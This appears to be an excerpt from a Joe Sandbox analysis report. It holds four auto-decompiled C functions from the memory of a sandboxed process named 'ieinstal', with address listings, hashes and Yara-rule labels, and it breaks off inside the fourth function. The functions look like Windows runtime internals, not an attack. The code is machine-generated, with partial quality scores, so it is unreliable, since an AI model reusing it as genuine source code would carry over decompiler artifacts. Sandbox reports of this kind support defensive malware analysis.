                                                            Function 1EC552A5 Relevance: .2, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E1EC552A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E1EC6EEF0(0x1ed479a0);
					_t104 =  *0x1ed48210; // 0x2e52db8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E1EC6EB70(_t93, 0x1ed479a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E1EC99890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E1EC6EEF0(0x1ed479a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E1EC6EB70(0, 0x1ed479a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x2e52dc5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E1EC8F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E1EC6EEF0(0x1ed479a0);
									__eflags =  *0x1ed48210 - _t104; // 0x2e52db8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1ed48210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E1ECD4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E1EC6EB70(_t95, 0x1ed479a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E1EC995D0();
											L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E1EC995D0();
											L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E1EC6EB70(_t93, 0x1ed479a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E1EC995D0();
										L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E1EC995D0();
										L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E1EC8F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                            0x1ec552a5
                                                            0x1ec552ad
                                                            0x1ec552b0
                                                            0x1ec552b3
                                                            0x1ec552b7
                                                            0x1ec552ba
                                                            0x1ec552bf
                                                            0x1ec552c4
                                                            0x1ec552cc
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec552ce
                                                            0x1ec552d9
                                                            0x1ec552dd
                                                            0x1ec552e7
                                                            0x1ec552f7
                                                            0x1ec552f9
                                                            0x1ec552fd
                                                            0x1ecb0dcf
                                                            0x1ecb0dd5
                                                            0x1ecb0dd6
                                                            0x1ecb0dd7
                                                            0x1ecb0dd8
                                                            0x1ecb0dd9
                                                            0x1ecb0dde
                                                            0x1ecb0ddf
                                                            0x1ecb0de0
                                                            0x1ecb0de1
                                                            0x1ecb0de2
                                                            0x1ecb0de5
                                                            0x1ecb0dea
                                                            0x1ecb0dec
                                                            0x1ecb0f60
                                                            0x1ecb0f64
                                                            0x1ecb0f70
                                                            0x1ecb0f76
                                                            0x1ecb0f79
                                                            0x1ecb0f79
                                                            0x00000000
                                                            0x1ecb0f64
                                                            0x1ecb0df2
                                                            0x1ecb0df7
                                                            0x1ecb0e04
                                                            0x1ecb0e0d
                                                            0x1ecb0e0d
                                                            0x1ecb0e10
                                                            0x1ecb0e1a
                                                            0x1ecb0e1c
                                                            0x1ecb0e4c
                                                            0x1ecb0e52
                                                            0x1ecb0e61
                                                            0x1ecb0e67
                                                            0x1ecb0e6b
                                                            0x1ecb0e70
                                                            0x1ecb0e76
                                                            0x1ecb0ed7
                                                            0x1ecb0edc
                                                            0x1ecb0ee0
                                                            0x1ecb0ee6
                                                            0x1ecb0eea
                                                            0x1ecb0eed
                                                            0x1ecb0ef0
                                                            0x1ecb0ef3
                                                            0x1ecb0ef6
                                                            0x1ecb0ef9
                                                            0x1ecb0efe
                                                            0x1ecb0f01
                                                            0x1ecb0f01
                                                            0x1ecb0f0b
                                                            0x1ecb0f12
                                                            0x1ecb0f16
                                                            0x1ecb0f18
                                                            0x1ecb0f1b
                                                            0x1ecb0f2c
                                                            0x1ecb0f31
                                                            0x1ecb0f31
                                                            0x1ecb0f35
                                                            0x1ecb0f39
                                                            0x1ecb0f3a
                                                            0x1ecb0f3c
                                                            0x1ecb0f3f
                                                            0x1ecb0f50
                                                            0x1ecb0f55
                                                            0x1ecb0f55
                                                            0x1ecb0f59
                                                            0x1ec552eb
                                                            0x1ec552f1
                                                            0x1ec552f1
                                                            0x1ecb0e7d
                                                            0x1ecb0e84
                                                            0x1ecb0e88
                                                            0x1ecb0e8a
                                                            0x1ecb0e8d
                                                            0x1ecb0e9e
                                                            0x1ecb0ea3
                                                            0x1ecb0ea3
                                                            0x1ecb0ea7
                                                            0x1ecb0eaf
                                                            0x1ecb0eb3
                                                            0x1ecb0eb9
                                                            0x1ecb0eb9
                                                            0x1ecb0ebc
                                                            0x1ecb0ecd
                                                            0x1ecb0ecd
                                                            0x00000000
                                                            0x1ecb0eb3
                                                            0x1ecb0e21
                                                            0x1ecb0e2b
                                                            0x1ecb0e2f
                                                            0x1ecb0e30
                                                            0x1ecb0e3a
                                                            0x1ecb0e3f
                                                            0x1ecb0e41
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb0e47
                                                            0x00000000
                                                            0x1ecb0e47
                                                            0x1ecb0df9
                                                            0x1ecb0dfe
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb0dfe
                                                            0x1ec55303
                                                            0x1ec55307
                                                            0x00000000
                                                            0x1ec55309
                                                            0x00000000
                                                            0x1ec55309
                                                            0x1ec55307
                                                            0x1ec552e9
                                                            0x1ec552e9
                                                            0x00000000
                                                            0x1ec552e9
                                                            0x1ec5530e
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9b90d8b77a7d5b4c3aeb2098731c6ba1c81b1dbd3c0c09d995e5c375b945ee34
                                                            • Instruction ID: f145675955af271dc9c33e77086315558768825bd609193a31475080a3aef2fb
                                                            • Opcode Fuzzy Hash: 9b90d8b77a7d5b4c3aeb2098731c6ba1c81b1dbd3c0c09d995e5c375b945ee34
                                                            • Instruction Fuzzy Hash: F151B736605382AFC321CF68CC81B5BBBA5BFA4750F100F1AE49587A50EB30E844CB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC82AE4 Relevance: .2, Instructions: 159COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E1EC82AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1ed48204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1ed48208; // 0x1ed48207
				_t8 = _t57 + 0x1ed48208; // 0x1ed48207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1ed48450; // 0x2ea6948
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x1ed4821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1ed46d5c; // 0x7f560654
							_t72 =  *0x1ed46d5c; // 0x7f560654
							_t75 =  *0x1ed46d5c; // 0x7f560654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1ed46d5c; // 0x7f560654
							_t84 =  *0x1ed46d5c; // 0x7f560654
							_t87 =  *0x1ed46d5c; // 0x7f560654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E1EC9F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                            0x1ec82ae4
                                                            0x1ec82aec
                                                            0x1ec82aef
                                                            0x1ec82af4
                                                            0x1ec82af7
                                                            0x1ec82afd
                                                            0x1ec82b92
                                                            0x1ec82b92
                                                            0x1ec82b97
                                                            0x1ec82b9c
                                                            0x1ec82b9c
                                                            0x1ec82b03
                                                            0x1ec82b06
                                                            0x1ec82b09
                                                            0x1ec82b09
                                                            0x1ec82b0f
                                                            0x1ec82b15
                                                            0x1ec82b15
                                                            0x1ec82b1b
                                                            0x1ec82b1e
                                                            0x1ec82b21
                                                            0x1ec82b26
                                                            0x1ec82b29
                                                            0x1ec82b81
                                                            0x1ec82b84
                                                            0x1ec82c0e
                                                            0x1ec82c15
                                                            0x1ec82c24
                                                            0x1ec82c24
                                                            0x1ec82b8a
                                                            0x1ec82b8a
                                                            0x1ec82b8a
                                                            0x1ec82b8a
                                                            0x1ec82b90
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec82b4a
                                                            0x1ec82b4a
                                                            0x1ec82b4d
                                                            0x1ec82b53
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec82b55
                                                            0x1ec82b58
                                                            0x1ec82bb7
                                                            0x1ecc5d1b
                                                            0x1ecc5d37
                                                            0x1ecc5d47
                                                            0x1ecc5d53
                                                            0x1ec82bbd
                                                            0x1ec82bbd
                                                            0x1ec82bbd
                                                            0x1ec82bb7
                                                            0x1ec82b5d
                                                            0x1ec82c2f
                                                            0x1ecc5d5b
                                                            0x1ecc5d77
                                                            0x1ecc5d87
                                                            0x1ecc5d93
                                                            0x1ec82c35
                                                            0x1ec82c35
                                                            0x1ec82c35
                                                            0x1ec82c2f
                                                            0x1ec82b65
                                                            0x1ec82b9f
                                                            0x1ec82ba2
                                                            0x1ec82b67
                                                            0x1ec82b67
                                                            0x1ec82b69
                                                            0x1ec82b6b
                                                            0x1ec82b6e
                                                            0x1ec82bc9
                                                            0x1ec82bcc
                                                            0x1ec82bcf
                                                            0x1ec82bd4
                                                            0x1ec82bd6
                                                            0x1ec82bd6
                                                            0x1ec82bdb
                                                            0x1ec82c02
                                                            0x1ec82c05
                                                            0x1ec82c07
                                                            0x00000000
                                                            0x1ec82c07
                                                            0x1ec82be0
                                                            0x1ec82c00
                                                            0x1ec82c3f
                                                            0x1ec82c3f
                                                            0x00000000
                                                            0x1ec82c00
                                                            0x1ec82be5
                                                            0x1ec82be7
                                                            0x1ec82bec
                                                            0x1ec82bf4
                                                            0x1ec82bf6
                                                            0x00000000
                                                            0x1ec82bf6
                                                            0x1ec82b70
                                                            0x1ec82b76
                                                            0x1ec82b2b
                                                            0x1ec82b2b
                                                            0x1ec82b2d
                                                            0x1ec82b2f
                                                            0x1ec82b32
                                                            0x1ec82b35
                                                            0x1ec82b3a
                                                            0x00000000
                                                            0x1ec82b40
                                                            0x1ec82b43
                                                            0x1ec82b45
                                                            0x1ec82b47
                                                            0x1ec82b4a
                                                            0x1ec82b4d
                                                            0x1ec82b53
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec82b53
                                                            0x1ec82b78
                                                            0x1ec82b78
                                                            0x1ec82b7b
                                                            0x1ec82b7e
                                                            0x00000000
                                                            0x1ec82b7e
                                                            0x1ec82b76
                                                            0x1ec82ba5
                                                            0x1ec82ba5
                                                            0x1ec82ba8
                                                            0x1ec82bad
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec82baf
                                                            0x1ec82baf
                                                            0x1ec82bc2
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4bdea854999d7a76ebaee5720d9fca497dc2ef23f3c5323a66c5e1775ddfa6bf
                                                            • Instruction ID: ba8f934aaad4606d5c452e257faf9c8ee948a9b004bda7ec9448dbaf3e3a712e
                                                            • Opcode Fuzzy Hash: 4bdea854999d7a76ebaee5720d9fca497dc2ef23f3c5323a66c5e1775ddfa6bf
                                                            • Instruction Fuzzy Hash: 2851D176A00125CFCB18CF1DCA94DBDB7B6FF98B04701865AE856AB314E730AE41CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC7DBE9 Relevance: .1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 86%
                                                            			E1EC7DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E1EC5CC50(E1EC54510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E1EC77D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E1ED28ED6(_t102, _t98);
						}
						_t76 = _v44;
						E1EC72280(_t58, _v44);
						E1EC7DD82(_v44, _t102, _t98);
						E1EC7B944(_t102, _v5);
						return E1EC6FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1ed48628; // 0x0
							_v28 = _t67;
							_t68 =  *0x1ed4862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1ed48628; // 0x0
						_t105 = _v28;
						_t80 =  *0x1ed4862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x1ed1fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                            0x1ec7dbe9
                                                            0x1ec7dbf2
                                                            0x1ec7dbf7
                                                            0x1ec7dbf9
                                                            0x1ec7dbfc
                                                            0x1ec7dc00
                                                            0x1ec7dc03
                                                            0x1ec7dc14
                                                            0x1ec7dd54
                                                            0x1ec7dd54
                                                            0x1ec7dd54
                                                            0x1ec7dc18
                                                            0x1ec7dc1d
                                                            0x1ec7dc1d
                                                            0x1ec7dc32
                                                            0x1ec7dc3b
                                                            0x1ec7dc3e
                                                            0x1ec7dc46
                                                            0x1ec7dd5b
                                                            0x1ec7dd62
                                                            0x1ec7dd64
                                                            0x1ec7dd67
                                                            0x1ec7dd69
                                                            0x1ec7dd6b
                                                            0x1ec7dd6e
                                                            0x1ec7dd70
                                                            0x1ec7dd73
                                                            0x1ec7dd73
                                                            0x00000000
                                                            0x1ec7dc4c
                                                            0x1ec7dc4e
                                                            0x1ecc3ae3
                                                            0x1ecc3ae8
                                                            0x1ecc3aea
                                                            0x1ec7dce7
                                                            0x1ec7dce9
                                                            0x1ec7dcec
                                                            0x1ec7dcee
                                                            0x1ec7dcf0
                                                            0x1ec7dcf3
                                                            0x1ec7dcf5
                                                            0x1ecc3af2
                                                            0x1ecc3af5
                                                            0x1ecc3af5
                                                            0x1ec7dd06
                                                            0x1ec7dd08
                                                            0x1ec7dd0b
                                                            0x1ec7dd12
                                                            0x1ecc3b08
                                                            0x1ec7dd18
                                                            0x1ec7dd18
                                                            0x1ec7dd18
                                                            0x1ec7dd20
                                                            0x1ec7dd23
                                                            0x1ecc3b16
                                                            0x1ecc3b16
                                                            0x1ec7dd29
                                                            0x1ec7dd2d
                                                            0x1ec7dd36
                                                            0x1ec7dd40
                                                            0x1ec7dd51
                                                            0x1ec7dd51
                                                            0x1ec7dc54
                                                            0x1ec7dc59
                                                            0x1ec7dc59
                                                            0x1ec7dc5e
                                                            0x1ec7dc5e
                                                            0x1ec7dc63
                                                            0x1ec7dc66
                                                            0x1ec7dc6b
                                                            0x1ec7dc78
                                                            0x1ec7dc7b
                                                            0x1ec7dc81
                                                            0x1ec7dc81
                                                            0x1ec7dc83
                                                            0x1ec7dc89
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec7dd7b
                                                            0x1ec7dd7b
                                                            0x1ec7dc8f
                                                            0x1ec7dc8f
                                                            0x1ec7dc92
                                                            0x1ec7dc99
                                                            0x1ec7dc9f
                                                            0x1ec7dca5
                                                            0x1ec7dcaa
                                                            0x1ec7dcaa
                                                            0x1ec7dcb3
                                                            0x1ec7dcb8
                                                            0x1ec7dcbb
                                                            0x1ec7dcc1
                                                            0x1ec7dccf
                                                            0x1ec7dcd2
                                                            0x1ec7dcd5
                                                            0x1ec7dcd7
                                                            0x1ec7dcda
                                                            0x1ec7dcdc
                                                            0x1ec7dcdc
                                                            0x1ec7dce2
                                                            0x1ec7dce4
                                                            0x00000000
                                                            0x1ec7dce4

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e0245d8a40c912215aaf96734f5984dbe1f7c5777489dd97f381d97efb41f03
                                                            • Instruction ID: 5c626d850fd6ddbb128b90519616f186dbd403de8668e6d3e220263777d73b74
                                                            • Opcode Fuzzy Hash: 6e0245d8a40c912215aaf96734f5984dbe1f7c5777489dd97f381d97efb41f03
                                                            • Instruction Fuzzy Hash: F451BF76E00656CFCB04CFA9C890A8EFFF2BF59350F20865AD555A7344DB71A944CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC6EF40 Relevance: .1, Instructions: 147COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 96%
                                                            			E1EC6EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E1EC59080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
